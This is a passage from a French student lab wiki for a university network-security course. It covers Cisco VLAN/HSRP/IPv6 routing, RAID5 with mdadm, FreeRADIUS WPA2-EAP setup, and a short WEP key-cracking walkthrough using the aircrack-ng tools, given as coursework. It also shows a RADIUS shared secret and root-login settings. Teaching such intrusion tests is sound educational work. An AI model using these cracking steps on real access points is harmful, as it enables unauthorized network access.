 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49090</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49090"/>
				<updated>2018-12-21T15:13:21Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Sécurisation du réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
